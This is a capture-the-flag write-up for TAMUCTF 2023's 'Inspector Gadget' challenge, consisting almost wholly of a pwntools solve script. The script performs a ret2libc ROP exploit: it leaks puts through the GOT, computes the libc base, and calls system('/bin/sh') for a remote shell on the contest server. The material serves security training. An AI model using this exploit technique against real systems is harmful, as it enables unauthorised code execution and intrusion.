Inspector Gadget
05/04/2023
By: unvariant
Tags: pwn TAMUCTF-2023Problem Description:
Inspector Gadget gave me this binary with one goal. pwn.
Hints:
Reveal Hints
NoneSolve script
from pwn import *
file = ELF("./inspector-gadget")
libc = ELF("./libc.so.6")
p = remote("tamuctf.com", 443, ssl=True, sni="inspector-gadget")
rdi = 0x40127b
ret = 0x401016
attack = b"A" * 0x10
attack += p64(ret)
attack += p64(rdi)
attack += p64(file.got["puts"])
attack += p64(file.plt["puts"])
attack += p64(file.symbols["pwnme"])
print(attack)
p.recvuntil(b"pwn me\n")
p.send(attack.ljust(0x60, b"\x00"))
leak = p.recv(6)
leak = u64(leak + b"\x00\x00")
print(f"leak: {leak:x}")
base = leak - libc.symbols["puts"]
print(f"base: {base:x}")
shell = next(libc.search(b"/bin/sh\x00"))
print(f"shell: {shell:x}")
attack = b"A" * 0x10
attack += p64(ret)
attack += p64(rdi)
attack += p64(base + shell)
attack += p64(base + libc.symbols["system"])
p.recvuntil(b"pwn me\n")
p.send(attack.ljust(0x60, b"\x00"))
p.interactive()